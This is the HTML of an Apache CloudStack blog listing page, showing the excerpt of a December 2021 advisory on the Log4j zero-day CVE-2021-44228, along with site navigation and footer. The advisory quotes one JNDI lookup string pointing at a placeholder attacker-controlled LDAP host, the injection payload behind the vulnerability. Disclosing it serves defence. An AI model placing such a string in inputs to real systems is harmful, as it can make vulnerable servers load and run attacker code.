itemprop="datePublished">December 13, 2021</time></div><div class="margin-top--md margin-bottom--sm row"><div class="col col--6 authorCol_Hf19"><div class="avatar margin-bottom--sm"><a href="https://github.com/rohityadavcloud" target="_blank" rel="noopener noreferrer" class="avatar__photo-link"><img class="avatar__photo" src="https://github.com/rohityadavcloud.png" alt="Rohit Yadav" itemprop="image"></a><div class="avatar__intro" itemprop="author" itemscope="" itemtype="https://schema.org/Person"><div class="avatar__name"><a href="https://github.com/rohityadavcloud" target="_blank" rel="noopener noreferrer" itemprop="url"><span itemprop="name">Rohit Yadav</span></a></div><small class="avatar__subtitle" itemprop="description">PMC Member</small></div></div></div></div></header><div class="markdown" itemprop="articleBody"><p>On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported. It is by now tracked under CVE-2021-44228:</p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228" target="_blank" rel="noopener noreferrer">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228</a>.<p>CVE-2021-44228 vulnerability is classified under the highest severity mark and allows an attacker to execute arbitrary code by injecting a sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}" into a logged message. Apache Log4j 2.x is reported to be affected as it performs a lookup (string substitution) using the JNDI protocol, whenever the "${jndi:...}" string is found within a message parameter.</p></div><footer class="row docusaurus-mt-lg"><div class="col col--9"><b>Tags:</b><ul class="tags_jXut padding--none margin-left--sm"><li class="tag_QGVx"><a class="tag_zVej tagRegular_sFm0" href="/blog/tags/announcement">announcement</a></li></ul></div><div class="col text--right col--3"><a aria-label="Read more about CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)" href="/blog/log4jshell"><b>Read More</b></a></div></footer></article><nav class="pagination-nav" aria-label="Blog list page navigation"><a class="pagination-nav__link pagination-nav__link--prev" href="/blog/tags/announcement"><div class="pagination-nav__label">Newer Entries</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/blog/tags/announcement/page/3"><div class="pagination-nav__label">Older Entries</div></a></nav></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="margin-bottom--sm"><a href="https://cloudstack.apache.org/" rel="noopener noreferrer" class="footerLogoLink_BH7S"><img src="/img/ACS_logo_slogan.svg" alt="Apache CloudStack logo" class="themedImage_ToTc themedImage--light_HNdA footer__logo"><img src="/img/ACS_logo_slogan.svg" alt="Apache CloudStack logo" class="themedImage_ToTc themedImage--dark_i4oU footer__logo"></a></div><div class="footer__copyright"> |
| <div class="social"> |
| <a href="mailto:dev-subscribe@cloudstack.apache.org"> |
| <img src="/img/mail_mini_icon.svg" alt=""> |
| </a> |
| <a href="https://join.slack.com/t/apachecloudstack/shared_invite/zt-2aegc22z7-tPCxpptfcebTBtd59qcZSQ"> |
| <img src="/img/slack_mini_icon.svg" alt=""> |
| </a> |
| <a href="https://github.com/apache/cloudstack"> |
| <img src="/img/git_mini_icon.svg" alt=""> |
| </a> |
| <a href="https://twitter.com/CloudStack"> |
| <img src="/img/twitter_X_mini_icon.svg" alt=""> |
| </a> |
| <a href="https://www.youtube.com/@ApacheCloudStack"> |
| <img src="/img/youtube_mini_icon.svg" alt=""> |
| </a> |
| <a href="https://www.linkedin.com/company/apachecloudstack/posts/"> |
| <img src="/img/linkedin_icon.svg" alt=""> |
| </a> |
| </div> |
| <div class="footer-bottom">Copyright © 2023 The Apache |
| Software Foundation, Licensed under the Apache License, Version 2.0. |
| “Apache”, “CloudStack”, “Apache CloudStack”, the Apache CloudStack logo, |
| the Apache CloudStack Cloud Monkey logo and the Apache feather logos |
| are registered trademarks or trademarks of The Apache Software |
| Foundation. |
| <p class="footer-blue"><a href="/trademark-guidelines">Apache CloudStack Trademark Usage</a> - <a href="/bylaws">Apache CloudStack Community ByLaws</a> - <a href="https://github.com/apache/cloudstack-www">Website Source Code</a></p></div> |
| </div> |
| <br> |
| </div></div></footer></div> |
| <script src="/assets/js/runtime~main.60ecdf28.js"></script> |
| <script src="/assets/js/main.2d60fa8d.js"></script> |
| </body> |
| </html> |
